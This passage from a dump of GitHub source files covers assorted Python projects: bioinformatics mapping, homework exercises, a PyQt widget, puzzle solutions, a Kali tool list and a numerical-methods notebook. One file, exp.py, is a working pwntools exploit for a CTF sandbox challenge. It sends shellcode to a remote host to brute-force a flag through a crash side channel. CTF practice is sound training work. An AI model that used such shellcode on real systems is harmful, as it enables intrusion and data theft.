...')\nad_sp = sc.read_h5ad('data/STARmap.h5ad')\nprint(ad_sp)\n\n##### Load SMARTSeq2 sn data, 45768 profiled cells with 23178 genes\nprint('Reading MOp 10Xv3 single cell data ...')\nad_sc = sc.read_h5ad('data/SMARTSeq2.h5ad')\nprint(ad_sc)\n# normalize the number of counts within each cell to a fixed number\nprint('Normalizing counts ...')\nsc.pp.normalize_total(ad_sc)\nprint('Preparing for mapping ...')\ntg.pp_adatas(ad_sc, ad_sp, genes=None)\n\n##### Map\nprint('Mapping single cells onto space ...')\nfor i in range(9):\n # either using cpu or using GPU, I strongly recommend GPU, either from the server or from Google Collab\n ad_map = tg.map_cells_to_space(\n adata_sc=ad_sc,\n adata_sp=ad_sp,\n device='cuda:0',\n # device='cpu',\n mode='constrained',\n density_prior='uniform',\n num_epochs=500,\n target_count=ad_sp.shape[1],\n lambda_f_reg=1,\n lambda_count=1\n )\n print('Saving map')\n ad_map.write(filename=f'data/ad_maps/STARmap/ad_map{i}.h5ad')","repo_name":"JudithBernett/Spatial_Transcriptomics","sub_path":"obtain_tangram_ad_maps.py","file_name":"obtain_tangram_ad_maps.py","file_ext":"py","file_size_in_byte":2617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"23162031769","text":"# 1\na = {'Андрій', 'Сергій', 'Олександр', 'Марія', 'Оксана'}\nb = {'Оксана', 'Андрій', 'Олексій', 'Сергій', 'Олександр', 'Іван'}\n\nprint('Імена боржників за Червень та Липень:')\nprint(a.intersection(b))\n\nprint('Імена боржників за Липень :')\nprint(b.difference(a))\n\n# 2\ncamelcase_strings = [\"FirstItem\", \"FriendsList\", \"MyTuple\"]\nsnakecase_strings = []\n\nfor string in camelcase_strings:\n snakecase_string = \"\"\n for i, char in enumerate(string):\n if char.isupper():\n if i > 0:\n snakecase_string += \"_\"\n snakecase_string += char.lower()\n else:\n snakecase_string += char\n snakecase_strings.append(snakecase_string)\n\nprint(snakecase_strings)\n","repo_name":"Serjkeey/homework-hillel","sub_path":"Homework_9/homework_9.py","file_name":"homework_9.py","file_ext":"py","file_size_in_byte":829,"program_lang":"python","lang":"uk","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"92285222","text":"from 
importlib import resources\nimport webbrowser\n\nfrom PyQt5 import uic, QtCore, QtWidgets\n\n\nclass TableCellActions(QtWidgets.QWidget):\n abort_job = QtCore.pyqtSignal(str)\n delete_job = QtCore.pyqtSignal(str)\n\n def __init__(self, job, *args, **kwargs):\n \"\"\"Actions in a table cell\n\n Used for the \"Running Uploads\" table in the \"Uploads\" tab.\n \"\"\"\n super(TableCellActions, self).__init__(*args, **kwargs)\n ref_ui = resources.files(\n \"dcoraid.gui.upload\") / \"widget_tablecell_actions.ui\"\n with resources.as_file(ref_ui) as path_ui:\n uic.loadUi(path_ui, self)\n\n self.job = job\n # signals and slots\n self.tb_abort.clicked.connect(self.on_abort)\n self.tb_delete.clicked.connect(self.on_delete)\n self.tb_error.clicked.connect(self.on_error)\n self.tb_retry.clicked.connect(self.on_retry)\n self.tb_view.clicked.connect(self.on_view)\n\n @QtCore.pyqtSlot()\n def on_abort(self):\n self.abort_job.emit(self.job.dataset_id)\n\n @QtCore.pyqtSlot()\n def on_delete(self):\n self.delete_job.emit(self.job.dataset_id)\n\n @QtCore.pyqtSlot()\n def on_error(self):\n msg = QtWidgets.QMessageBox()\n msg.setIcon(QtWidgets.QMessageBox.Critical)\n msg.setText(\"There was an error during data transfer. If this happens \"\n + \"often or with a particular type of dataset, please \"\n + \"\"\n + \"create an issue online.\")\n msg.setWindowTitle(\"Job {} error\".format(self.job.dataset_id[:5]))\n msg.setDetailedText(self.job.traceback)\n msg.exec_()\n\n @QtCore.pyqtSlot()\n def on_retry(self):\n self.job.retry_upload()\n\n @QtCore.pyqtSlot()\n def on_view(self):\n url = self.job.get_dataset_url()\n webbrowser.open(url)\n\n def refresh_visibility(self, job):\n \"\"\"Show or hide the different toolbuttons depending on the job state\"\"\"\n self.job = job\n state = job.state\n\n if state in [\"online\", \"verify\", \"finalize\", \"done\"]:\n self.tb_view.show()\n else:\n self.tb_view.hide()\n\n if state in [\"abort\", \"error\"]:\n self.tb_retry.show()\n else:\n self.tb_retry.hide()\n\n if state == \"error\":\n self.tb_error.show()\n else:\n self.tb_error.hide()\n\n if state in [\"compress\", \"transfer\"]:\n self.tb_abort.show()\n else:\n self.tb_abort.hide()\n\n if state not in [\"compress\", \"transfer\"]:\n self.tb_delete.show()\n else:\n self.tb_delete.hide()\n","repo_name":"DCOR-dev/DCOR-Aid","sub_path":"dcoraid/gui/upload/widget_tablecell_actions.py","file_name":"widget_tablecell_actions.py","file_ext":"py","file_size_in_byte":2711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"4680446023","text":"# buildings - tablica zawierajaca 5-cio elementowe tablice [ (0_poczatek, 1_koniec, 2_ilosc_studentow, 3_koszt, 4_miejsce w tablicy T )]\r\n# posortowana względem początków przedziałów, a w przypadku identycznych początków, posortowana po końcach przedziałów\r\n\r\n# funkcja g(i,x,G,buildings) zwraca największą liczbę studentów jaka może mieszkać w akademikach o indeksach mniejszych od i, zawsze wliczając do tego\r\n# akademik na indeksie i; łączny koszt tych akedemików jest mniejszy lub równy x. \r\n# Dla wartości skrajnych: jeśli x jest większy lub równy cenie akademika to w tablicy wpisywana jest liczba studentów mogąych zamieszkać w tym akademiku, w przeciwnym\r\n# wypadku do komórek wpisywane jest zero\r\n\r\n# Po znalezieniu indeksu \"xyz\" akademika którego łączna liczba studentów jest największa symuluje się dodwawanie kolejnych akdemików. 
Cofając się w tył od znalezionego indeksu\r\n# \"xyz\" sprawdzając czy liczba_studentów - liczba_studentów_w_akademiku_xyz oraz budżet-cena_akademika_xyz są takie same w tablicy G oraz czy budynek kończy się przed\r\n# początkiem budynku xyz.\r\n\r\n# G[i][j] - tablica w której przechowywane są wartości zwracane przez g dla danego akademika na pozycji i oraz łacznym maksymalnym koszcie j\r\n\r\nfrom zad4testy import runtests\r\n\r\ndef g(i,x,G, tab):\r\n if G[i][x] != -1:\r\n return G[i][x]\r\n maksymalne=0\r\n if tab[i][3]<=x:\r\n maksymalne=tab[i][2]\r\n for j in range(i-1,-1,-1):\r\n if x-tab[i][3]>=0 and tab[j][1]maksymalnie:\r\n maksymalnie = G[j][p]\r\n odpowiedz=j\r\n \r\n \r\n result=[]\r\n ostatni=odpowiedz\r\n result.append(buildings[odpowiedz][4])\r\n maksymalnie-=buildings[odpowiedz][2]\r\n price=p-buildings[odpowiedz][3]\r\n for indeks in range(odpowiedz, -1, -1):\r\n if maksymalnie==G[indeks][price] and price>=0 and maksymalnie-buildings[indeks][2]>=0 and buildings[indeks][1]0\n debug(f\"dir={dir}, bomb_dist == WARMER:{bomb_dist == WARMER}\")\n if dir == (bomb_dist == WARMER):\n self.lower_bound = middle\n else:\n self.upper_bound = middle\n debug(f\"new bounds: {self.lower_bound}-{self.upper_bound}\")\n\n # cheating detection\n if self.lower_bound > self.upper_bound:\n raise AssertionError(\"You are cheating! (Or I am dumb)\")\n\n return self.guess_new(curr)\n\n def guess_new(self, curr):\n dist_to_low = abs(curr - self.lower_bound)\n dist_to_upp = abs(curr - self.upper_bound)\n return self.lower_bound if dist_to_low >= dist_to_upp else self.upper_bound-1\n\n\ndef getXGuess(currx, prevx, bomb_direction):\n # if bomb_direction == UNKNOWN:\n # return xGuesser.guess()\n # if bomb_direction == COLDER:\n return xGuesser.updateBounds(currx, prevx, bomb_direction)\n # return xGuesser.guess()\n\n\ndef getYGuess(curry, prevy, bomb_direction):\n return yGuesser.updateBounds(curry, prevy, bomb_direction)\n # return yGuesser.guess()\n\n# W: width of the building.\n# H: height of the building.\nW, H = [int(i) for i in input().split()]\nN = int(input()) # maximum number of turns before game over.\nX0, Y0 = [int(i) for i in input().split()] # Batman start position\n\ndebug(W, H, N, X0, Y0)\ndebug(\"I will guess it in max {} turns\".format(ceil(log2(max(W,H) - 0 + 1))))\n\nxGuesser = NumberGuesser(W)\ncurrx = X0\nyGuesser = NumberGuesser(H)\ncurry = Y0\n\nprevx, prevy = X0, Y0\n# game loop\nwhile 1:\n bomb_dir = input() # Current distance to the bomb compared to previous distance (COLDER, WARMER, SAME or UNKNOWN)\n\n new_currx = getXGuess(currx, prevx, bomb_dir)\n new_curry = getYGuess(curry, prevy, bomb_dir)\n if bomb_dir != UNKNOWN:\n prevx, prevy = currx, curry\n currx, curry = new_currx, new_curry\n print(str(currx) + \" \" + str(curry)) # the location of the next window Batman should jump to.\n\n","repo_name":"PROrock/codin-game-puzzles","sub_path":"python/very-hard/shadows-of-the-knight-2/knight-2.py","file_name":"knight-2.py","file_ext":"py","file_size_in_byte":2950,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"7647437938","text":"#!/usr/bin/env python3\n\n'''\nPlace the dict\n'''\n\n\ndef information_gathering():\n '''\n Return the dict\n '''\n\n rdict = {\n 1: 'acccheck',\n 2: 'ace-voip',\n 3: 'amap',\n 4: 'automater',\n 5: 0,\n 6: 'braa',\n 7: 'casefile',\n 8: 'cdpsnarf',\n 9: 'cisco-torch',\n 10: 'cookie-cadger',\n 11: 'copy-router-config',\n 12: 'dmitry',\n 13: 'dnmap',\n 14: 'dnsenum',\n 15: 'dnsmap',\n 16: 
'dnsrecon',\n 17: 'dnstracer',\n 18: 'dnswalk',\n 19: 'dotdotpwn',\n 20: 'enum4linux',\n 21: 'enumiax',\n 22: 'exploitdb',\n 23: 'fierce',\n 24: 'firewalk',\n 25: 'fragroute',\n 26: 'fragrouter',\n 27: 'ghost-phisher',\n 28: 'golismero',\n 29: 'goofile',\n 30: 'lbd',\n 31: 'maltego-teeth',\n 32: 'masscan',\n 33: 'metagoofil',\n 34: 'miranda',\n 35: 'nmap',\n 36: 0,\n 37: 'p0f',\n 38: 'parsero',\n 39: 'recon-ng',\n 40: 'set',\n 41: 'smtp-user-enum',\n 42: 'snmpcheck',\n 43: 'sslcaudit',\n 44: 'sslsplit',\n 45: 'sslstrip',\n 46: 'sslyze',\n 47: 'thc-ipv6',\n 48: 'theharvester',\n 49: 'tlssled',\n 50: 'twofi',\n 51: 'urlcrazy',\n 52: 'wireshark',\n 53: 'wol-e',\n 54: 'xplico',\n 55: 'ismtp',\n 56: 'intrace',\n 57: 'hping3',\n }\n\n return rdict\n\n\ndef vulnerability_analysis():\n '''\n Return\n '''\n\n rdict = {\n 1: 'bbqsql',\n 2: 'bed',\n 3: 'cisco-auditing-tool',\n 4: 'cisco-global-exploiter',\n 5: 'cisco-ocs',\n 6: 'cisco-torch',\n 7: 'copy-router-config',\n 8: 0,\n 9: 0,\n 10: 'doona',\n 11: 'dotdotpwn',\n 12: 'greenbone-security-assistant',\n 13: 0,\n 14: 'hexorbase',\n 15: 0,\n 16: 'jsql',\n 17: 'lynis',\n 18: 'nmap',\n 19: 'ohrwurm',\n 20: 'openvas-administrator',\n 21: 'openvas-cli',\n 22: 'openvas-manager',\n 23: 'openvas-scanner',\n 24: 'oscanner',\n 25: 'powerfuzzer',\n 26: 'sfuzz',\n 27: 'sidguesser',\n 28: 'siparmyknife',\n 29: 'sqlmap',\n 30: 'sqlninja',\n 31: 'sqlsus',\n 32: 'thc-ipv6',\n 33: 'tnscmd10g',\n 34: 'unix-privesc-check',\n 35: 'yersinia',\n }\n\n return rdict\n\n\ndef wireless_attacks():\n '''\n Return\n '''\n\n rdict = {\n 1: 'aircrack-ng',\n 2: 'asleap',\n 3: 'bluelog',\n 4: 0,\n 5: 0,\n 6: 'blueranger',\n 7: 'bluesnarfer',\n 8: 'bully',\n 9: 'cowpatty',\n 10: 'crackle',\n 11: 'eapmd5pass',\n 12: 'fern-wifi-cracker',\n 13: 'ghost-phisher',\n 14: 'giskismet',\n 15: 0,\n 16: 0,\n 17: 'kalibrate-rtl',\n 18: 'killerbe',\n 19: 'kismet',\n 20: 'mdk3',\n 21: 'mfcuk',\n 22: 'mfoc',\n 23: 'mfterm',\n 24: 'multimon-ng',\n 25: 'pixiewps',\n 26: 'reaver',\n 27: 'redfang',\n 28: 'rtlsdr-scanner',\n 29: 'spooftooph',\n 30: 'wifi-honey',\n 31: 'wifitap',\n 32: 'wifite',\n }\n\n return rdict\n\n\ndef web_applications():\n '''\n Return\n '''\n rdict = {\n 1: 'apache-users',\n 2: 'arachni',\n 3: 'bbqsql',\n 4: 'blindelephant',\n 5: 'burpsuite',\n 6: 'cutycapt',\n 7: 0,\n 8: 'davtest',\n 9: 'deblaze',\n 10: 'drib',\n 11: 'dirbuster',\n 12: 'fimap',\n 13: 'funkload',\n 14: 'grabber',\n 15: 'jboss-autopwn',\n 16: 'joomscan',\n 17: 'jsql',\n 18: 'maltego-teeth',\n 19: 'padbuster',\n 20: 'paros',\n 21: 'parsero',\n 22: 'plecost',\n 23: 'powerfuzzer',\n 24: 'proxystrike',\n 25: 'recon-ng',\n 26: 'skipfish',\n 27: 'sqlmap',\n 28: 'sqlninjg',\n 29: 'sqlsus',\n 30: 'ua-tester',\n 31: 'uniscan',\n 32: 'vega',\n 33: 'w3af',\n 34: 'webscarab',\n 35: 0,\n 36: 0,\n 37: 'websploit',\n 38: 'wfuzz',\n 39: 'wpscan',\n 40: 'xsser',\n 41: 'zaproxy',\n }\n\n return rdict\n\n\ndef sniffing_spoofing():\n '''\n Return\n '''\n\n rdict = {\n 1: 'burpsuite',\n 2: 'dnschef',\n 3: 'fiked',\n 4: 'hamster-sidejack',\n 5: 'hexinject',\n 6: 'iaxflood',\n 7: 'inviteflood',\n 8: 'ismtp',\n 9: 0,\n 10: 'mitmproxy',\n 11: 'ohrwurm',\n 12: 'protos-sip',\n 13: 'rebind',\n 14: 'responder',\n 15: 'rtpbreak',\n 16: 'rtpinsertsound',\n 17: 'rtpmixsound',\n 18: 'sctpscan',\n 19: 'siparmyknife',\n 20: 'sipp',\n 21: 'sipvicious',\n 22: 'sniffjoke',\n 23: 'sslsplit',\n 24: 'ssltrip',\n 25: 'thc-ipv6',\n 26: 'voiphopper',\n 27: 'webscarab',\n 28: 'wifi-honey',\n 29: 'wireshark',\n 30: 'xspy',\n 31: 'yersinia',\n 32: 
'zaproxy',\n }\n\n return rdict\n\n\ndef maintaining_access():\n '''\n Return\n '''\n\n rdict = {\n 1: 'cryptcat',\n 2: 'cymothoa',\n 3: 'dbd',\n 4: 'dns2tcp',\n 5: 'http-tunnel',\n 6: 'httptunnel',\n 7: 'intersect',\n 8: 'nishang',\n 9: 'polenum',\n 10: 'powersploit',\n 11: 'pwnat',\n 12: 'ridenum',\n 13: 'sbd',\n 14: 'u3-pwn',\n 15: 'webshells',\n 16: 'weevely',\n }\n\n return rdict\n\n\ndef reporting_tools():\n '''\n Return\n '''\n\n rdict = {\n 1: 'casefile',\n 2: 'cutycapt',\n 3: 'dos2unix',\n 4: 'dradis',\n 5: 'keepnote',\n 6: 'magictree',\n 7: 'metagoofil',\n 8: 'nipper-ng',\n 9: 'pipal',\n }\n\n return rdict\n\n\ndef exploitation_tools():\n '''\n Return\n '''\n\n rdict = {\n 1: 'armitage',\n 2: 'backdoor-factory',\n 3: 'beef-xss',\n 4: 'cisco-auditing-tool',\n 5: 'cisco-global-exploiter',\n 6: 'cisco-ocs',\n 7: 'cisco-torch',\n 8: 0,\n 9: 'crackle',\n 10: 'jbos-autopwn',\n 11: 'linux-exploit-suggester',\n 12: 'maltego-teech',\n 13: 'set',\n 14: 'shellnoob',\n 15: 'sqlmap',\n 16: 'thc-ipv6',\n 17: 'yersinia',\n }\n\n return rdict\n\n\ndef forensics_tools():\n '''\n Return\n '''\n\n rdict = {\n 1: 'binwalk',\n 2: 'bulk-extractory',\n 3: 0,\n 4: 'chntpw',\n 5: 'cuckoo',\n 6: 'dc3dd',\n 7: 'ddrescue',\n 8: 0,\n 9: 0,\n 10: 'dumpzilla',\n 11: 'extundelete',\n 12: 'foremost',\n 13: 'galleta',\n 14: 'guymager',\n 15: 'iphone-backup-analyzer',\n 16: 'p0f',\n 17: 'pdf-parser',\n 18: 'pdfid',\n 19: 'pdgmail',\n 20: 'peepdf',\n 21: 0,\n 22: 'volatility',\n 23: 'xplico',\n }\n\n return rdict\n\n\ndef stress_testing():\n '''\n Return\n '''\n\n rdict = {\n 1: 'dhcpig',\n 2: 'funkload',\n 3: 'iaxflood',\n 4: 0,\n 5: 'inviteflood',\n 6: 'ipv6-toolkit',\n 7: 'mdk3',\n 8: 'reaver',\n 9: 'rtpflood',\n 10: 'slowhttptest',\n 11: 't50',\n 12: 'termineter',\n 13: 'thc-ipv6',\n 14: 'thc-ssl-dos',\n }\n\n return rdict\n\n\ndef password_attacks():\n '''\n Return\n '''\n\n rdict = {\n 1: 'acccheck',\n 2: 'burpsuite',\n 3: 'cewl',\n 4: 'chntpw',\n 5: 'cisco-auditing-tools',\n 6: 'cmospwd',\n 7: 'creddump',\n 8: 'crunch',\n 9: 0,\n 10: 'findmyhash',\n 11: 'gpp-decrypt',\n 12: 'hash-identifier',\n 13: 'hexorbase',\n 14: 0,\n 15: 'john',\n 16: 'johnny',\n 17: 'keimpx',\n 18: 'maltego-teeth',\n 19: 'maskprocessor',\n 20: 'multiforcer',\n 21: 'ncrack',\n 22: 'oclgausscrack',\n 23: 'pack',\n 24: 'patator',\n 25: 0,\n 26: 'polenum',\n 27: 'rainbowcrack',\n 28: 'rcracki-mt',\n 29: 'rsmangler',\n 30: 0,\n 31: 'statsprocessor',\n 32: 'thc-pptp-bruter',\n 33: 'truecrack',\n 34: 'webscarab',\n 35: 'wordlists',\n 36: 'zaproxy',\n }\n\n return rdict\n\n\ndef reverse_engineering():\n '''\n Return\n '''\n\n rdict = {\n 1: 'apktool',\n 2: 'dex2jar',\n 3: 'python-diStorm3',\n 4: 'edb-debugger',\n 5: 'jad',\n 6: 'javasnoop',\n 7: 'JD',\n 8: 'OllyDbg',\n 9: 'smali',\n 10: 'Valgrind',\n 11: 'YARA',\n }\n\n return rdict\n\n\ndef hardware_hacking():\n '''\n Return\n '''\n\n rdict = {\n 1: 'android-sdk',\n 2: 'apktool',\n 3: 'arduino',\n 4: 'dex2jar',\n 5: 'sakis3g',\n 6: 'smali',\n }\n\n return rdict\n\n\ndef extra():\n '''\n Return\n '''\n\n rdict = {\n 1: 0,\n 2: 'squid3',\n }\n\n return rdict\n","repo_name":"rikonaka/katoolin4china","sub_path":"k4c/toollist.py","file_name":"toollist.py","file_ext":"py","file_size_in_byte":9125,"program_lang":"python","lang":"en","doc_type":"code","stars":73,"dataset":"github-code","pt":"77"} +{"seq_id":"31833905885","text":"#!/usr/bin/env python3\nfrom pwn import *\n\ncontext.arch = 'amd64'\ncontext.log_level = 'warning'\ncontext.terminal = ['tmux', 'split', '-h']\n\nENCODING = 'ISO-8859-1'\ns = 
lambda senddata : p.send(senddata.encode(ENCODING))\nsa = lambda recvdata, senddata : p.sendafter(recvdata.encode(ENCODING), senddata.encode(ENCODING))\nsl = lambda senddata : p.sendline(senddata.encode(ENCODING))\nsla = lambda recvdata, senddata : p.sendlineafter(recvdata.encode(ENCODING), senddata.encode(ENCODING))\nr = lambda numb=0x3f3f3f3f, timeout=0x3f3f3f3f : p.recv(numb, timeout=timeout).decode(ENCODING)\nru = lambda recvdata, timeout=0x3f3f3f3f : p.recvuntil(recvdata.encode(ENCODING), timeout=timeout).decode(ENCODING)\nuu32 = lambda data : u32(data.encode(ENCODING), signed='unsigned')\nuu64 = lambda data : u64(data.encode(ENCODING), signed='unsigned')\niu32 = lambda data : u32(data.encode(ENCODING), signed='signed')\niu64 = lambda data : u64(data.encode(ENCODING), signed='signed')\nup32 = lambda data : p32(data, signed='unsigned').decode(ENCODING)\nup64 = lambda data : p64(data, signed='unsigned').decode(ENCODING)\nip32 = lambda data : p32(data, signed='signed').decode(ENCODING)\nip64 = lambda data : p64(data, signed='signed').decode(ENCODING)\n\ndef bruteforce(idx, ch):\n global p\n local = 0\n if local:\n p = process('./sandbox')\n else:\n p = remote('124.16.75.162', 31056)\n\n ru('gift: 0x')\n flag_addr = int(ru('\\n')[:-1], 16)\n info('flag_addr = ' + hex(flag_addr))\n\n magic = 0xdeadbeefdeadbeef\n\n sh = asm('''\n xor rbx, rbx\n xor rdx, rdx\n mov rbx, {}\n mov rdx, {}\n xor rbx, rdx\n mov al, [rbx + {}]\n cmp al, {}\n je label\n int 3\n label:\n xor rax, rax\n mov al, 0x3c\n xor rdi, rdi\n syscall\n '''.format(flag_addr ^ magic, magic, idx, ch))\n #print(disasm(sh))\n\n #gdb.attach(p, 'set follow-fork-mode child\\nb *0x5555554010ea\\nc')\n\n if b'\\0' in sh:\n p.close()\n return 'failed'\n\n ru('pls input your shellcode: ')\n p.send(sh + b'\\0')\n\n #p.interactive()\n\n try:\n r = p.recv(timeout=0.1)\n except EOFError:\n r = ''\n finally:\n p.close()\n\n return r\n\nprint(bruteforce(0, ord('f')))\nprint(bruteforce(0, ord('l')))\nprint(bruteforce(4, ord('{')))\n\n'''\nflag = ''\nidx = 0\ntarget = b'OVER!\\n'\ntable = '0123456789abcdefghijklmnopqrstuvwxyz!{}_'\nwhile True:\n if bruteforce(idx, 0) == target:\n warning('Over')\n break\n else:\n warning('Not the end')\n for c in table:\n r = bruteforce(idx, ord(c))\n if r == target:\n flag += c\n idx += 1\n warning(flag)\n break\n'''\n\n","repo_name":"r4b3rt/writeups","sub_path":"NeverStopExpoit/20220723/ezbox/exp.py","file_name":"exp.py","file_ext":"py","file_size_in_byte":2704,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"71194230008","text":"career = ['Lawyer','Doctor/Pharmacist','Architecture/Physical Planner','Teacher/lecturer','Psychology','Lab Technician/Scientist']\r\ncareer_questions = ['Which field interest you most\\n1.Law and Philosophy\\n2.Public Health and Medecine\\n3.Built Environment and Real Estate Management\\\r\n \\n4.Early Chilhood Education and Teaching\\n5.Understanding Human Behaviour\\n6.chemical reactions','Favourite subjects\\n1.maths\\n2.sciences\\n3.Humanities\\n4.Languages']\r\ndef careerPath():\r\n print(\"Career planner\".center(60, \" \"))\r\n print(\"-\" * 60, \"\\n\")\r\n while True:\r\n print(career_questions[0])\r\n choice = eval(input(\"Enter your choice: \"))\r\n print(career_questions[1])\r\n choice2 = eval(input(\"Enter your choice: \"))\r\n if choice == 1:\r\n if choice2 == 3 and 4:\r\n print(\"Your best career path is\",career[0])\r\n else:\r\n print('The above Subject is not suitable for this course,\\\r\n \\nthis course 
takes Humanity and Languages') \r\n break\r\n\r\n elif choice == 2:\r\n if choice2 == 2 and 1:\r\n print(\"Your best career path is\",career[1])\r\n else:\r\n print('The above Subject is not suitable for this course,\\\r\n \\nthis course takes Sciences and Maths') \r\n break\r\n elif choice == 3:\r\n if choice2 == 3 and 1 and 2:\r\n print(\"Your best career path is\",career[2])\r\n else:\r\n print('The above Subject is not suitable for this course,\\\r\n \\nthis course takes Humanities,sciences and Maths') \r\n break\r\n elif choice == 4:\r\n if choice2 == 4 and 3:\r\n print(\"Your best career path is\",career[3])\r\n print('The above Subject is not suitable for this course,\\\r\n \\nthis course takes Humanities and Languages') \r\n break\r\n elif choice == 5:\r\n if choice2 == 2 and 3:\r\n print(\"Your best career path is\",career[4])\r\n print('The above Subject is not suitable for this course,\\\r\n \\nthis course takes Humanities and sciences.') \r\n break\r\n elif choice == 6:\r\n if choice2 == 2 and 1:\r\n print(\"Your best career path is\",career[5])\r\n print('The above Subject is not suitable for this course,\\\r\n \\nthis course takes sciences and Maths') \r\n break\r\n else:\r\n print('Error!!Wrong input') \r\n\r\n print(\"Thank you for consulting us,you are welcomed again\")\r\n print(\"-\" * 60, \"\\n\\n\")\r\n","repo_name":"JackWatua/Group-13-Hackathon-Projects","sub_path":"careerChallenge.py","file_name":"careerChallenge.py","file_ext":"py","file_size_in_byte":2671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"73591135290","text":"from Utils import *\n\n# Part 1\n\ninp = \"11100010111110100\"\ndisk_len = 35651584\n\n\ndef fill_disk(a, desired):\n while len(a) < desired:\n b = a[-1::-1]\n b = \"\".join([str(int(x == '0')) for x in b])\n a = a + '0' + b\n\n print(len(a))\n\n return a[:disk_len]\n\n\ndata = fill_disk(inp, disk_len)\nchecksum = ''\n\nwhile len(data) % 2 == 0:\n print(len(data))\n checksum = ''\n for i in range(0, len(data), 2):\n pair = data[i:i+2]\n\n if pair[0] == pair[1]:\n checksum += '1'\n else:\n checksum += '0'\n\n data = checksum\n\nprint(data)\n\n# 10:12 (87th)\n\n# Part 2\n\n# 11:16 (68th)","repo_name":"bjebert/adventofcode","sub_path":"2016/16.py","file_name":"16.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"40424437029","text":"from library.InDocTable import CInDocTableModel, CDateInDocTableCol, CFloatInDocTableCol, CCalculatedInDocTableCol\n\n\n'''\nCreated on 11.04.2014\n\n@author: atronah\n'''\n\n\nclass CClientAntrophometricModel(CInDocTableModel):\n def __init__(self, parent = None):\n super(CClientAntrophometricModel, self).__init__(u'ClientAnthropometric',\n u'id',\n u'client_id',\n parent)\n self.addCol(CDateInDocTableCol(u'Дата', 'date', 50))\n #atronah: возможно лучше текстом, так как CIntInDocTableCol вроде не допускает пустого значения \n self.addCol(CFloatInDocTableCol(u'Рост, см', 'height', 15, min = 30, max = 290, precision = 1))\n self.addCol(CFloatInDocTableCol(u'Вес, кг', 'weight', 15, min = 0.200, max = 700, precision = 3))\n self.addCol(CFloatInDocTableCol(u'Об. талии, см', 'waist', 15, min = 30, max = 500, precision = 1))\n self.addCol(CFloatInDocTableCol(u'Об. 
груди, см', 'bust', 15, min = 30, max = 500, precision = 1))\n        self.addCol(CCalculatedInDocTableCol(u'Индекс массы тела', \n                                             'height', \n                                             50, \n                                             additionalFieldList = ['weight'],\n                                             calculateFunc = lambda h, w: round(w.toDouble()[0] / (max(h.toDouble()[0] / 100, 0.001) ** 2), 1)\n                                             ))\n        \n","repo_name":"dio4/vista_1","sub_path":"Registry/ClientAnthropometric.py","file_name":"ClientAnthropometric.py","file_ext":"py","file_size_in_byte":1689,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"}
+{"seq_id":"29481917889","text":"class hashtag:\n    def __init__(self):\n        self.hashtag=\"\"\n        self.veces=0\n    def __repr__(self):\n        return repr((self.hashtag, self.veces))\n    def agregar(self,nombre):\n        self.hashtag=nombre\n        self.veces= 1\n    def sumar(self,veces):\n        self.veces=self.veces+veces\n    \n\nclass Twitter:\n    def __init__(self):\n        self.trending_topics=[]\n    def tweet(self,mensaje):\n        hashtags=[]\n        if len(mensaje)>140:\n            return None\n        else:\n            c=0\n            for i in mensaje:\n                if i ==\"#\":\n                    existe = False\n                    for e in range(c,len(mensaje)):\n                        try:\n                            if mensaje[e+1]==\" \":\n                                break\n                        except IndexError:\n                            pass\n                        for y in hashtags:\n                            if y.hashtag == mensaje[c:e+1]:\n                                y.sumar(1)\n                                existe=True\n                        for y in self.trending_topics:\n                            if y == mensaje[c:e+1]:\n                                existe=True\n                    if not existe:\n                        a=hashtag()\n                        a.agregar(mensaje[c:e+1])\n                        hashtags.append(a)\n                        self.trending_topics.append(a.hashtag)\n\n                c=c+1\n\nif __name__ == \"__main__\":\n    twitter=Twitter()\n    twitter.tweet(\"gano #laroja\")\n    twitter.tweet(\"grande #chile\")\n    twitter.tweet(\"#laroja con dos goles, le gano a brasil, grande #laroja\")\n    print(twitter.trending_topics)\n    ","repo_name":"pabloschwarzenberg/grader","sub_path":"tema9_ej1/tema9_ej1_15633608.py","file_name":"tema9_ej1_15633608.py","file_ext":"py","file_size_in_byte":1614,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
+{"seq_id":"21410220498","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # Numerical Homework 3\n# \n# Code as follows for problems that require it\n# \n# #### Original work created on 18/11/2022\n# \n# #### Author: Terry Cox \n# \n\n# In[2]:\n\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n\n# ## Problem 1\n# \n\n# In[50]:\n\n\ndef f(x):\n    return np.cos(2*x**2) - x**2\n\ndef dx(x):\n    return -4*x*np.sin(2*x**2) - 2*x\n\nx = np.linspace(0, 1.5, 1000)\n\nplt.plot(x,f(x))\nplt.plot(x,dx(x))\nplt.show()\n\n\n# #### a)\n\n# In[51]:\n\n\ndef newton_iterate(x, f, dx):\n    return x - f(x)/dx(x)\n\ndef Newtons_Method(f, dx, x0, tol=1e-10):\n    results = {'x' : [x0], 'fx' : [f(x0)], 'abs_error' : [np.abs(f(x0))]}\n    if dx(x0) == 0:\n        print('Derivative is 0. 
